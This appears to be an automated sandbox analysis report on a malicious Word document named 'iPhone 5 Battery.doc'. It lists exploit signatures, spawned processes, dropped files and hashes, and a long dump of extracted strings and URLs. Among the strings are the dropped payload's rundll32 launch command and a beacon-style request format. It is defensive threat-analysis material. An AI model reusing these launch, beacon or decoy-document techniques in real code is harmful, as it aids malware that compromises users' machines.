JBX Analysis Report

General Information
Start time: 14:33:56
Start date: 16/08/2012
Overall analysis duration: 0h 3m 18s
Sample file name: iPhone 5 Battery.doc
Cookbook file name: officeall.jbs
Analysis system description: XP SP3, Office 2003 SP3
Number of analysed new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Errors:
  • Too many NtProtectVirtualMemory calls (excessive behavior)
  • Too many NtAllocateVirtualMemory calls (excessive behavior)
  • Too many NtUserMessageCall calls (excessive behavior)
  • Too many NtSetInformationFile calls (excessive behavior)
  • Too many NtWriteFile calls (excessive behavior)

Classification / Threat Score
Persistence, Installation, Boot Survival :
Hiding, Stealthiness, Detection and Removal Protection :
Security Solution / Mechanism bypass, termination and removal, Anti Debugging, VM Detection :
Spreading :
Exploiting :
Networking :
Data spying, Sniffing, Keylogging, Ebanking Fraud :

Matching Signatures
Binary contains paths to debug symbols
Creates files inside the user directory
Creates temporary files
Downloads files
Printf formatting strings found in memory and binary data
Reads ini files
Runs a DLL by calling functions
Spawns processes
Urls found in memory or binary data
Creates an autostart registry key
Creates mutexes \BaseNamedObjects\Local\Mutex_MSOSharedMem \BaseNamedObjects\DirectSound DllMain mutex (0x00000488) \BaseNamedObjects\Local\Mso97SharedDg20321108172Mutex \BaseNamedObjects\oleacc-msaa-loaded \BaseNamedObjects\DDrawWindowListMutex \BaseNamedObjects\__DDrawExclMode__ \BaseNamedObjects\StiTraceMutexSti_Trace.log \BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-507921405-1960408961-839522115-500 \BaseNamedObjects\Local\Mso97SharedDg19521108172Mutex \BaseNamedObjects\Local\Mso97SharedDg19211108172Mutex \BaseNamedObjects\Global\WiaDebugFileMut \BaseNamedObjects\Local\Mso97SharedDg19531108172Mutex \BaseNamedObjects\OfficeAssistantStateMutex \BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-507921405-1960408961-839522115-500 \BaseNamedObjects\__DDrawCheckExclMode__
Downloads files from webservers via HTTP
Drops PE files
Found strings which match to known social media urls
May tried to detect the virtual machine to detect the environment (VM Detection)
Performs DNS lookups
Posts data to webserver
Allocates a big amount of memory (probably used for heap spraying)
Creates and opens a fake document (probably a fake document to hide exploiting)
Document exploit detected (droppes PE files)
Document exploit detected (performs DNS queries)
Document exploit detected (performs HTTP gets)
Document exploit detected (process start blacklist hit)
Infects executable files (exe, dll, sys, html) C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE

Startup
  • system is office2003sp3
  • WINWORD.EXE (PID: 1160 MD5: 443747857245BF90847AE396C53470A6)
    • ~WORDL.tmp (PID: 1112 MD5: 99C47CE55EF67DAEE72E82608E4F62DD)
      • rundll32.exe (PID: 760 MD5: 037B1E7798960E0420003D05BB577EE6)
      • cmd.exe (PID: 868 MD5: 6D778E0F95447E6546553EEEA709D03C)
    • cmd.exe (PID: 1096 MD5: 6D778E0F95447E6546553EEEA709D03C)
      • WINWORD.EXE (PID: 900 MD5: 443747857245BF90847AE396C53470A6)
  • svchost.exe (PID: 1832 MD5: 27C6D03BCDB8CFEB96B716F3D8BE3E18)
  • cleanup

Created / dropped Files
File Path MD5
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Word8.0\ShockwaveFlashObjects.exd A4DE5E2A16D82D803735967C783CA368
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~WRD0002.doc 3B8EE5F6275A30671021B1594506A58D
C:\DOCUME~1\ADMINI~1\LOCALS~1\iPhone 5.doc 13847C659F831C6AEA3C480597E424C8
C:\DOCUME~1\ADMINI~1\LOCALS~1\~$hone 5.doc 9B2BEAB1F4B66A3331B6C566C7E6DDFA
C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp 99C47CE55EF67DAEE72E82608E4F62DD
C:\Documents and Settings\Administrator\Application Data\Microsoft\Office\Recent\Local Settings.LNK 1C17F458C1BD5844CBC9E71F84AD77B9
C:\Documents and Settings\Administrator\Application Data\Microsoft\Office\Recent\iPhone 5.doc.LNK 34ECC7FCCE484F8B7042FA98735EC494
C:\Documents and Settings\Administrator\Application Data\Microsoft\Office\Recent\index.dat B030A356C4F75056E6F7FAD09309FE2E
C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC FFE89BDDF49F24398D21523137827222
C:\Documents and Settings\Administrator\Application Data\Microsoft\Templates\~$Normal.dot A0F4BD67F4388E1BC61D5DBB85D5650F
C:\Documents and Settings\Administrator\Application Data\taskman.dll FE7E03F7F62F2D65C5B8E233300A373C
C:\Documents and Settings\Administrator\Desktop\~$hone 5 Battery.doc 411239DF57C33F1405AF3453F7EC9A35
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.MSO\3430B573.wmf B26FB08CB1A991E87742C0C5DFD5CAE7
C:\WINDOWS\wiadebug.log 2C04268C23022887648C318054663351
C:\WINDOWS\wiaservc.log 5F8BD4D1DCDF5F8FC86B68BE433B6245
\ROUTER 6685DD0933ADE478A22AE7864388C7F7
\net\NtControlPipe11 67118A81A9461CA93D1DCBD673828CFE
\srvsvc 00010789CF97BAA5F49E8C7BF0605D58

Contacted Domains
No contacted domains info

Contacted IPs
No contacted IP infos

Static File Info
File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Code page: 1252, Title: , Author: Mark, Template: Normal, Last Saved By: Mark, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Aug 9 12:38:00 2012, Last Saved Time/Date: Thu Aug 9 12:38:00 2012, Number of Pages: 1, Number of Words: 7, Number of Characters: 41, Security: 0
File name: iPhone 5 Battery.doc
File size: 298496
MD5: 7e3770351aed43fd6c5cab8e06dc0300
SHA1: b4562ef0cd54234374ff9d24e0d1b01c1db5e873
SHA256: 742db588c3cfa416215619db34e168be58846058f7528adee8358bb8b8b68fe3
SHA512: 3c1c1189eb94725517024761d4a31ba351611ad432ea0dcce89e4961c28c7233363f6feb431602308ff704396781df62147907e382a14b1754d7b9e31ca2fac6

String Analysis
Debug symbol paths
String value Source
gdi32.pdb 6C3CF.dmp.dr
user32.pdb 6C3CF.dmp.dr
setupapi.pdb 6C3CF.dmp.dr
vsplab1\otools\BBT_TEMP\WINWORDO.pdb 6C3CF.dmp.dr
ole32.pdb 6C3CF.dmp.dr
d3d8thk.pdb 6C3CF.dmp.dr
version.pdb 6C3CF.dmp.dr
msctfime.pdb 6C3CF.dmp.dr
schannel.pdb 6C3CF.dmp.dr
ws2_32.pdb 6C3CF.dmp.dr
comdlg32.pdb 6C3CF.dmp.dr
COMRes.pdb 6C3CF.dmp.dr
unidrvui.pdb 6C3CF.dmp.dr
ieframe.pdb 6C3CF.dmp.dr
fontsub.pdb 6C3CF.dmp.dr
apphelp.pdb 6C3CF.dmp.dr
urlmon.pdb 6C3CF.dmp.dr
mxdwdrv.pdb 6C3CF.dmp.dr
msi.pdb 6C3CF.dmp.dr
Flash.pdb 6C3CF.dmp.dr
msasn1.pdb 6C3CF.dmp.dr
userenv.pdb 6C3CF.dmp.dr
crypt32.pdb 6C3CF.dmp.dr
dciman32.pdb 6C3CF.dmp.dr
sxs.pdb 6C3CF.dmp.dr
msvcrt.pdb 6C3CF.dmp.dr
winspool.pdb 6C3CF.dmp.dr
netapi32.pdb 6C3CF.dmp.dr
rpcrt4.pdb 6C3CF.dmp.dr
MSO.pdb 6C3CF.dmp.dr
secur32.pdb 6C3CF.dmp.dr
kernel32.pdb 6C3CF.dmp.dr
msctf.pdb 6C3CF.dmp.dr
ws2help.pdb 6C3CF.dmp.dr
clbcatq.pdb 6C3CF.dmp.dr
c:\postbuild\opt\microsoftwindowsgdiplus-1100-gdiplus.pdb 6C3CF.dmp.dr
msimg32.pdb 6C3CF.dmp.dr
normaliz.pdb 6C3CF.dmp.dr
iertutil.pdb 6C3CF.dmp.dr
imm32.pdb 6C3CF.dmp.dr
winword.pdb 6C3CF.dmp.dr
riched20.pdb 6C3CF.dmp.dr
advapi32.pdb 6C3CF.dmp.dr
mscms.pdb 6C3CF.dmp.dr
winsta.pdb 6C3CF.dmp.dr
shell32.pdb 6C3CF.dmp.dr
prntvpt.pdb 6C3CF.dmp.dr
d3d9.pdb 6C3CF.dmp.dr
dsound.pdb 6C3CF.dmp.dr
v\private\11.0\devsplab1\setup\X86\ship\Files\PFiles\Common\MSShared\Office11\MSO.pdb 6C3CF.dmp.dr
splab1\otools\BBT_TEMP\RICHED20O.pdb 6C3CF.dmp.dr
ntdll.pdb 6C3CF.dmp.dr
shlwapi.pdb 6C3CF.dmp.dr
wininet.pdb 6C3CF.dmp.dr
wtsapi32.pdb 6C3CF.dmp.dr
oleaut32.pdb 6C3CF.dmp.dr
comctl32.pdb 6C3CF.dmp.dr
uxtheme.pdb 6C3CF.dmp.dr
winmm.pdb 6C3CF.dmp.dr
MicrosoftWindowsCommon-Controls-6.0.2600.6028-comctl32.pdb 6C3CF.dmp.dr
Formattings for printf style functions
String value Source
3[)%gY WINWORD.EXE
Identified by %s7%1!ls! WINWORD.EXE
Netscape Navigator profile: %s WINWORD.EXE
%OHB"s WINWORD.EXE
|%SystemRoot%\system32\rsvpsp.dll rundll32.exe
%s hr WINWORD.EXE
%SystemRoot%\Debug\UserMode\userenv.bak cmd.exe
%s Document|*%s|All Files|*.*|| WINWORD.EXE
var L_ACR_ReturnTo_TEXT = "Try to return to %s"; WINWORD.EXE
Unknown-Lear&n more about search provider preferences%Lear&n more about InPrivate Filtering WINWORD.EXE
https://office.bcentral.com/eServices/index?DPC=%ProductCode%&DCC=%AppComponentCode%&AppName=%ApplicationName%&CLCID=%UILang%&HelpLCID=%HelpLang% WINWORD.EXE, 6C3CF.dmp.dr
Start Page.Would you like to set your Start Page to "%s"? WINWORD.EXE
%SystemRoot%\Debug\UserMode\userenv.log cmd.exe
%s Line: %ld Character: %ld WINWORD.EXE
Accelerators: %s WINWORD.EXE
'&7%x/ WINWORD.EXE
Netscape versions less than 4.0"Netscape Navigator 4.0 profile: %s WINWORD.EXE
%sAuthor: %s WINWORD.EXE
End downloading component %s WINWORD.EXE
>%PP@lw WINWORD.EXE
%s (expiring) WINWORD.EXE
%s\%s\%s\%s\%s\%s cmd.exe
Do you want to replace it?+Cannot find %s. WINWORD.EXE
Default: %s WINWORD.EXE
loginmid=%s&nickid=1&s=%s WINWORD.EXE, rundll32.exe, taskman.dll.dr, ~WORDL.tmp.dr
%s min WINWORD.EXE
re = /%s/g; WINWORD.EXE
G%L%8%N%O%P%4%R%E%T%I%V% WINWORD.EXE
%SystemRoot%\System32\mswsock.dll rundll32.exe
%P?T%P?<rP?XJP?`JP?8rP? rP? WINWORD.EXE
Pw%n[w cmd.exe
Connecting to site %s WINWORD.EXE
%C&&]N WINWORD.EXE
%ls %ls cmd.exe
6This is the full list of %s. No filters are available. WINWORD.EXE
Export the favorites to %s WINWORD.EXE
Export the cookies to %s WINWORD.EXE
Go to '%s' WINWORD.EXE
)V%Y%[%]%_%a%c%e%g%i%k%m%o%q%s% WINWORD.EXE
%s (Upgrade) WINWORD.EXE
%u minute ago WINWORD.EXE
Packager*Would you like to allow pop-ups from '%s'?*Would you like to block pop-ups from '%s'? WINWORD.EXE
New Folder (%d) WINWORD.EXE
Disclosed to others who might contact you for marketing of services and/or products. You will have an opportunity to ask the site not to do this.%Disclosed to others for any purposes. WINWORD.EXE
%oft Shared\office11\ WINWORD.EXE
YB|)9;!}ga em`o%Gwhu WINWORD.EXE
%sWhat's New: %s WINWORD.EXE
Installing component %s WINWORD.EXE
Tab Group %d WINWORD.EXE
"%s"pInternet Explorer does not support this type of search provider. WINWORD.EXE
%s%s%s WINWORD.EXE, rundll32.exe, taskman.dll.dr, ~WORDL.tmp.dr
%systemroot%\system32\com\dmp WINWORD.EXE
Back to %s (Alt+Left) WINWORD.EXE
%u hours ago WINWORD.EXE
http://%s.com WINWORD.EXE
1Are you sure you want to delete History Item: %s?7Are you sure you want to delete these %d History items?5Are you sure you want to delete the selected Cookies? WINWORD.EXE
Do you want to format it now?)The disk in drive %c cannot be formatted. WINWORD.EXE
URL:%s Protocol WINWORD.EXE
IVO28%dtw8QxVeJ2QUcN}lT]jI{jf(=1&L[-81-]66x5zbkkf(7)dqFgkW_BptK&IY9)z@'Ya0g)+vX'HDI1hlAB*Av(Q&g3&VT!fh'!$t.%,A3.*0lTwZD0wv$wmN+.f=.37iv!-jbM^P$OHQ55'Ah=J][6]2.`Q)@hUlM.?=m~Nj*ECtw0pl%6?*zSI?kbKH?q@[=1uvG8D)8DZ9=]3pfHL}{f97s]o?OVu@NuCskaR*]2b8'80pIMk?~~O9=KQ=l3 cmd.exe
Shows or hides the status bar.%Shows or hides formatting indicators. WINWORD.EXE
%s Accelerator WINWORD.EXE
%f7A{[ ~WORDL.tmp, rundll32.exe
%s (new) WINWORD.EXE
%s (Alt+Z) WINWORD.EXE
Pages visited %s%Pages visited in week starting %1!ws!#Pages visited from %1!ws! to %2!ws! WINWORD.EXE
%sSubject: %s WINWORD.EXE
Expires at: %s WINWORD.EXE
Updated %s WINWORD.EXE
%s|*%s|All Files|*.*|| WINWORD.EXE
Feed %d WINWORD.EXE
%s (Default)cPlease choose another default search provider for Internet Explorer before removing this selection. WINWORD.EXE
%d.%03d %d.%03d scale WINWORD.EXE, 6C3CF.dmp.dr
?%IF?P WINWORD.EXE
>%uE=u WINWORD.EXE
%F?n=>A_p|@ WINWORD.EXE
Search for "%s" WINWORD.EXE
P?d%P?hrP?\%P?drP?\rP?XrP?TrP?PrP?LrP?HrP?p*P?DrP? WINWORD.EXE
EncodeUrl = EncodeUrl + '%u' + OutputEncoder_TwoByteHex(c); WINWORD.EXE
BCD%FG<YZ[ WINWORD.EXE
yOpening %d tabs at once might take a long time and cause Internet Explorer to respond slowly. WINWORD.EXE
%s sec WINWORD.EXE
F!jkr%non)bc WINWORD.EXE
Import the favorites from %s WINWORD.EXE
%s\%s\%s\%s\%s cmd.exe
%u matches WINWORD.EXE
H$Bee%n: WINWORD.EXE
!f'V%naH WINWORD.EXE
%s - Security Warning$Al&ways ask before opening this file WINWORD.EXE
A%emC{ rundll32.exe
You have imported %i feeds. WINWORD.EXE
%s Suggestions WINWORD.EXE
http://office.bcentral.com/eServices/error?DPC=%ProductCode%&DCC=%AppComponentCode%&AppName=%ApplicationName%&CLCID=%UILang%&HelpLCID=%HelpLang% WINWORD.EXE, 6C3CF.dmp.dr
Assertion failed: %s, file %s, line %d cmd.exe
%sLast Updated: %s WINWORD.EXE
6%<%:%>%(%@%=%B%0%D% %F%,%H%C% WINWORD.EXE
%s (unverified publisher) WINWORD.EXE
of webpages that are designed for older browsers.aA problem displaying %s caused Internet Explorer to refresh the webpage using Compatibility View. WINWORD.EXE
/ !.#j%I'J9W;]=R? WINWORD.EXE
loginmid=%s&nickid=0&s=%s WINWORD.EXE, rundll32.exe, taskman.dll.dr, ~WORDL.tmp.dr
Add Search Providers...Mhttp://auto.search.msn.com/response.asp?MT={searchTerms}&srch=%d&prov=%s&utf8NThe following search provider is already installed. Do you want to replace it?9The following search provider is already installed: WINWORD.EXE
Sho&w: %s0Add-ons that have been used by Internet Explorer-Add-ons that run without requiring permission$Downloaded ActiveX Controls (32-bit)-Add-ons currently loaded in Internet Explorer WINWORD.EXE
Expires in: %s WINWORD.EXE
e}vgOe2BCxwc~jb>>%nedPQRSpjdl WINWORD.EXE
%d %d %d %d cmd.exe
(Not verified) %s WINWORD.EXE
%Opens a new Internet Explorer window./Adds the current page to your Favorites folder.&Previews how this document will print.*Prints the document in the selected frame. WINWORD.EXE
%s%s.exe WINWORD.EXE, rundll32.exe, taskman.dll.dr, ~WORDL.tmp.dr
text/x-ms-odc; charset=%s WINWORD.EXE, 6C3CF.dmp.dr
%sLast Visited: %s WINWORD.EXE
Expired %s WINWORD.EXE
%e;3Yd;9 6C3CF.dmp.dr
%ld sites WINWORD.EXE
https://office.bcentral.com/eServices/service?Command=WebPost&DPC=%ProductCode%&DCC=%AppComponentCode%&AppName=%ApplicationName%&CLCID=%UILang%&HelpLCID=%HelpLang% WINWORD.EXE, 6C3CF.dmp.dr
-M/A!R#E%E'Q9N;E= WINWORD.EXE
>s%GAZ WINWORD.EXE
%s Feed %d WINWORD.EXE
Pages visited at %s WINWORD.EXE
Redirecting to site: %s WINWORD.EXE
..+&%P WINWORD.EXE
Forward to %s (Alt+Right) WINWORD.EXE
DragDrop%lx cmd.exe
Import the cookies from %s WINWORD.EXE
AThere is no disk in drive %c. WINWORD.EXE
(Default for %s Accelerator)jThis Accelerator runs code. To remove this Accelerator, please try Remove Programs from the Control Panel. WINWORD.EXE
%Opens the webpage for this Web Slice. WINWORD.EXE
Open '%s' in a new tab WINWORD.EXE
(%d new) WINWORD.EXE
Start downloading from site: %s WINWORD.EXE
ache%OLK* WINWORD.EXE, ~WORDL.tmp, cmd.exe
IVO28%dtw8QxVeJ2QUcN}lT]jI{jf(=1&L[-81-]66x5zbkkf(7)dqFgkW_BptK&IY9)z@'Ya0g)+vX'HDI1hlAB*Av(Q&g3&VT!fh'!$t.%,A3.*0lTwZD0w WINWORD.EXE
Search %s WINWORD.EXE
%%s has requested information from you WINWORD.EXE
%s (expired) WINWORD.EXE
Getting data from cache %s#Website found. Waiting for reply... WINWORD.EXE
c123%I WINWORD.EXE
%d Weeks Ago WINWORD.EXE
S%Y%J%[%U%]%?%_%Q%a%M%c%d%e%b%g%Z%i%^%k%\%m%`%o%h%q%f%s%A%u%v%w%l%y%t%{%|%}%n% WINWORD.EXE
%d.%03d %d.%03d translate WINWORD.EXE, 6C3CF.dmp.dr
Application: %s WINWORD.EXE
%$%,%4%<%P% WINWORD.EXE
%u hour ago WINWORD.EXE
%s (Default) WINWORD.EXE
%$%,%4%<%l% WINWORD.EXE
"$%n&896;<=??01Z34597 WINWORD.EXE
%d.%03d %d.%03d translate %d.%03d rotate %d.%03d %d.%03d translate WINWORD.EXE, 6C3CF.dmp.dr
E&dit with %s WINWORD.EXE
%u minutes ago WINWORD.EXE
M8$e1`%e1 WINWORD.EXE
B9%IB2 WINWORD.EXE
,Select which folder you want to export from.+Where do you want to export your favorites?7Select where you would like your favorites exported to..Where do you want to import your cookies from?8You can select where we should import your cookies from.)Where do you want to export your cookies?6You can select where we should export your cookies to.-%s already exists. WINWORD.EXE
Keep &maximum items (%i) WINWORD.EXE
()*+,-0/ !2#$%gCUPTROIL^D^@345(7 WINWORD.EXE
l%s has been removed from this computer. Do you want to clean up your personalized settings for this program? WINWORD.EXE
%O*@hv# WINWORD.EXE
Navigate to '%s' WINWORD.EXE
rI]%ipF WINWORD.EXE
Insert a disk, and then try again.EThe disk in drive %c is not formatted. WINWORD.EXE
Search with %s WINWORD.EXE
This item expired %s WINWORD.EXE
%sComments: %s WINWORD.EXE
rundll32.exe "%s",start WINWORD.EXE, rundll32.exe, ~WORDL.tmp.dr
%SystemRoot%\system32\rsvpsp.dll rundll32.exe
Downloading from site: %s WINWORD.EXE
A%l[ABa WINWORD.EXE
Importing: %s WINWORD.EXE
)+%-%/%1%3%5%7%9%<%>%@%B%D% WINWORD.EXE
8A webpage is not responding on the following website: %s WINWORD.EXE
3~SR]AP\XP(}e+xek/l``fh%ii8mr~< WINWORD.EXE
88qB%S WINWORD.EXE
%s, %s WINWORD.EXE
Looking up %s WINWORD.EXE
erJ `%I" rundll32.exe
Search provider: %s WINWORD.EXE
var L_ACR_Title_TEXT = "We were unable to return you to %s."; WINWORD.EXE
Compatibility View(%s is now running in Compatibility View. WINWORD.EXE
Export the feeds to %s WINWORD.EXE
%N0l%N0L%N00%N0 6C3CF.dmp.dr
%s%03d.tmp WINWORD.EXE
%s bytes WINWORD.EXE
?Are you sure you want to import '%ls' to your Favorites folder?8Are you sure you want to export your Favorites to '%ls'?aFavorites cannot be imported because modification of favorites on this machine has been disabled.HThe Import/Export Wizard has been disabled by your system administrator.@Select Folder to Import Bookmarks WINWORD.EXE
%1!s!, %2!s!%Do you want to run or save this file? WINWORD.EXE
%sTitle: %s WINWORD.EXE
O28%dtw8QxVeJ2QUcN}lT]jI{jf(=1&L[-81-]66x5zbkkf(7)dqFgkW_BptK&IY9)z@'Ya0g)+vX'HDI1hlAB*Av(Q&g3&VT!fh'!$t.%,A3.*0lTwZD0wv$wmN+.f=.37iv!-jbM^P$ WINWORD.EXE
%d%% complete.CThe webpage could not be saved because one of its files is missing. WINWORD.EXE
Microsoft Windows cannot go on standby because %General_AppName% is busy sending an error report or recovering your documents. You must wait for the operation to complete and close any open dialogs. 6C3CF.dmp.dr
%SystemRoot%\System32\winrnr.dll rundll32.exe
Open in new tab (Ctrl+Enter)%Open '%s' in a tab group (Ctrl+Enter) WINWORD.EXE
%SystemRoot%\system32\mswsock.dll rundll32.exe
%F?ZJZ? WINWORD.EXE
This is the new setting suggested by %s WINWORD.EXE
Start downloading component %s WINWORD.EXE
http://www.%s.com Launch Internet Explorer Browser Launch Internet Explorer Browser WINWORD.EXE
%systemroot%\Registration WINWORD.EXE
#T%O'V9 WINWORD.EXE
%d.%03d 0 translate -1 1 scale WINWORD.EXE, 6C3CF.dmp.dr
%s File WINWORD.EXE
Drive %c cannot be accessed. WINWORD.EXE
Open all items (%u new) WINWORD.EXE
>\%P=i WINWORD.EXE
+Go to "%s" (Alt+Enter to open in a new tab) WINWORD.EXE
re = /%s/g; WINWORD.EXE
Filter by %s:jAre you sure you want to delete this feed item? WINWORD.EXE
Open '%s' in a background tab WINWORD.EXE
URLs
String value Source
http://%s.com WINWORD.EXE
http://9to5mac.com/2012/08/09/phch. WINWORD.EXE
http://9to5mac.com/2012/08/09/photos-of-purported-next-gen-iphones-higher-capacity-battery-3-8v-1440-mah/ iPhone 5.doc.dr
http://adobe.com/as3/2006/builtin WINWORD.EXE, iPhone 5 Battery.doc
http://ads1.msads.net/library/dapmsn.js rundll32.exe
http://ads1.msads.net/library/primedns.gif rundll32.exe
http://ads2.msads.net/cis/6/000/000/000/033/124.swf?fd=www.msn.com rundll32.exe
http://amazon.fr/ WINWORD.EXE
http://amch.questionmarket.com/adsc/d981545/4/982710/randm.js rundll32.exe
http://api.bing.com/qsonhs.aspx?form=asapiw&q= rundll32.exe
http://api.bing.com/qsonhs.aspx?form=msn005&q= rundll32.exe
http://api.search.live.com/qsml.aspx?query= WINWORD.EXE
http://ariadna.elmundo.es/ WINWORD.EXE
http://ariadna.elmundo.es/favicon.ico WINWORD.EXE
http://arianna.libero.it/ WINWORD.EXE
http://arianna.libero.it/favicon.ico WINWORD.EXE
http://asp.usatoday.com/ WINWORD.EXE
http://asp.usatoday.com/favicon.ico WINWORD.EXE
http://auone.jp/favicon.ico WINWORD.EXE
http://auto.search.msn.com/response.asp?mt= WINWORD.EXE
http://blst.msn.com/as/wea3/i/en-us/law/32.gif rundll32.exe
http://br.search.yahoo.com/ WINWORD.EXE
http://browse.guardian.co.uk/ WINWORD.EXE
http://browse.guardian.co.uk/favicon.ico WINWORD.EXE
http://busca.buscape.com.br/ WINWORD.EXE
http://busca.buscape.com.br/favicon.ico WINWORD.EXE
http://busca.estadao.com.br/favicon.ico WINWORD.EXE
http://busca.igbusca.com.br/ WINWORD.EXE
http://busca.igbusca.com.br//app/static/images/favicon.ico WINWORD.EXE
http://busca.orange.es/ WINWORD.EXE
http://busca.uol.com.br/ WINWORD.EXE
http://busca.uol.com.br/favicon.ico WINWORD.EXE
http://buscador.lycos.es/ WINWORD.EXE
http://buscador.terra.com.br/ WINWORD.EXE
http://buscador.terra.com/ WINWORD.EXE
http://buscador.terra.com/favicon.ico WINWORD.EXE
http://buscador.terra.es/ WINWORD.EXE
http://buscar.ozu.es/ WINWORD.EXE
http://buscar.ya.com/ WINWORD.EXE
http://busqueda.aol.com.mx/ WINWORD.EXE
http://cerca.lycos.it/ WINWORD.EXE
http://cgi.search.biglobe.ne.jp/ WINWORD.EXE
http://cgi.search.biglobe.ne.jp/favicon.ico WINWORD.EXE
http://ch.questionmarket.com/w3c/audit2007/p3p_dynamiclogic.xml rundll32.exe
http://clients5.google.com/complete/search?hl= WINWORD.EXE
http://cnet.search.com/ WINWORD.EXE
http://cnweb.search.live.com/ WINWORD.EXE
http://cnweb.search.live.com/favicon.ico WINWORD.EXE
http://col.stb00.s-msn.com/i/1e/3e92bbd62b7f2d1f41235eeddb35a6.jpg rundll32.exe
http://col.stb00.s-msn.com/i/50/92b0db83806125262f3fbc6e76b660.jpg rundll32.exe
http://col.stb00.s-msn.com/i/63/5eda2af65485ff69ad4520e57d0e1.jpg rundll32.exe
http://col.stb00.s-msn.com/i/72/8afac6155f34b259a4f96f36982e4.jpg rundll32.exe
http://col.stb00.s-msn.com/i/e2/37ba92e210d341bfdbf4126422a3d2.gif rundll32.exe
http://col.stb00.s-msn.com/i/e6/9808f6ee12e2a4c24f938b5c9a8e.jpg rundll32.exe
http://col.stb00.s-msn.com/i/eb/115c3eb4272fa8265b40e016a3709f.png rundll32.exe
http://col.stb00.s-msn.com/i/fe/3538a96c51fe1534cdb66fd82dc40.jpg rundll32.exe
http://col.stb01.s-msn.com/i/31/552b432109625bbda36a63534018.jpg rundll32.exe
http://col.stb01.s-msn.com/i/65/cdab2f44a1591d2b308c20c6c15375.jpg rundll32.exe
http://col.stb01.s-msn.com/i/67/1fa135fc2eb4d3cf2b682256c86c.jpg rundll32.exe
http://col.stb01.s-msn.com/i/81/a4e157504e3aa679304ffd461899f.jpg rundll32.exe
http://col.stb01.s-msn.com/i/8b/e25f5fdacdc9b49cbc70b9da4034ee.jpg rundll32.exe
http://col.stb01.s-msn.com/i/8e/6af523cd25586c16454dad90a077.gif rundll32.exe
http://col.stb01.s-msn.com/i/8f/a4352080832119cbd48417cd53821.jpg rundll32.exe
http://col.stb01.s-msn.com/i/ab/1f71f580fd1a60cf28e32311e06146.jpg rundll32.exe
http://col.stb01.s-msn.com/i/b7/eb75d45b8948f72ee451223e95a96.gif rundll32.exe
http://col.stb01.s-msn.com/i/c8/746f93d7dcc9693561971cfb1fcc3.jpg rundll32.exe
http://col.stb01.s-msn.com/i/d3/73518a60e4f99cefdf0e07ee9b66.jpg rundll32.exe
http://col.stc.s-msn.co rundll32.exe
http://col.stc.s-msn.com/br/sc/css/52/2488d24f533f797eebf2e5c5bdd0cd.css rundll32.exe
http://col.stc.s-msn.com/br/sc/i/0c/c57bc2a7d38843d7c4aa8028fc9f82.gif rundll32.exe
http://col.stc.s-msn.com/br/sc/i/2d/1db850e671ac9a39751a1482909ea6.jpg rundll32.exe
http://col.stc.s-msn.com/br/sc/i/42/8af5a9e564e2aee465684b0c63c345.png rundll32.exe
http://col.stc.s-msn.com/br/sc/i/44/8adae8665171049ce4960396c72c86.gif rundll32.exe
http://col.stc.s-msn.com/br/sc/i/5f/5280118e68aedbc5821d17132a5340.gif rundll32.exe
http://col.stc.s-msn.com/br/sc/i/76/6624502f65ce6b15f584f20925cd28.png rundll32.exe
http://col.stc.s-msn.com/br/sc/i/c1/cc36ca69630adc1a2052edc7351a47.gif rundll32.exe
http://col.stc.s-msn.com/br/sc/i/d7/2ce07deffbaa900124ec82a86c2c1f.gif rundll32.exe
http://col.stc.s-msn.com/br/sc/i/f8/614595fba50d96389708a4135776e4.gif rundll32.exe
http://col.stc.s-msn.com/br/sc/i/ff/290e7f0b12fa8a201581c74c1ae75a.gif rundll32.exe
http://col.stc.s-msn.com/br/sc/i/ff/adchoices_gif2.gif rundll32.exe
http://col.stc.s-msn.com/br/sc/i/icons/bing_websearch_2.jpg rundll32.exe
http://col.stj.s-msn.com/br/sc/js/51/anatm.js rundll32.exe
http://col.stj.s-msn.com/br/sc/js/99/ec02e7a208b0b89c5a221e9c76ca8979.js rundll32.exe
http://col.stj.s-msn.com/br/sc/js/bc/d3a1be3129df1dc11a599ea57981b2.js rundll32.exe
http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js rundll32.exe
http://col.stj.s-msn.com/primedns.gif?q=1 rundll32.exe
http://col.stj.s-msn.com/primedns.gif?q=2 rundll32.exe
http://corp.naukri.com/ WINWORD.EXE
http://corp.naukri.com/favicon.ico WINWORD.EXE
http://crl.microsoft.com/pki/crl/products/codesignpca.crl E6024EAC88E6B6165D49FE3C95ADD735.dr
http://cs.wikipedia.org/ WINWORD.EXE
http://cs.wikipedia.org/favicon.ico WINWORD.EXE
http://cs.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search= WINWORD.EXE
http://de.search.yahoo.com/ WINWORD.EXE
http://de.wikipedia.org/ WINWORD.EXE
http://de.wikipedia.org/favicon.ico WINWORD.EXE
http://de.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search= WINWORD.EXE
http://edmullen.net/bg.jpg rundll32.exe
http://edmullen.net/bg6.jpg rundll32.exe
http://edmullen.net/fclock.php rundll32.exe
http://edmullen.net/fla rundll32.exe
http://edmullen.net/menu_bg_s.jpg rundll32.exe
http://edmullen.net/sig_bg_s.jpg rundll32.exe
http://edmullen.net/sig_button.jpg rundll32.exe
http://edmullen.net/styles/default.css rundll32.exe
http://edmullen.net/styles/guitarwestern.ani rundll32.exe
http://edmullen.net/styles/guitarwestern.gif rundll32.exe
http://edmullen.net/styles/guitarwestern.png rundll32.exe
http://edmullen.net/styles/menu.css rundll32.exe
http://edmullen.net/styles/print.css rundll32.exe
http://en.wikipedia.org/ WINWORD.EXE
http://en.wikipedia.org/favicon.ico WINWORD.EXE
http://en.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search= WINWORD.EXE
http://es.ask.com/ WINWORD.EXE
http://es.search.yahoo.com/ WINWORD.EXE
http://es.wikipedia.org/ WINWORD.EXE
http://es.wikipedia.org/favicon.ico WINWORD.EXE
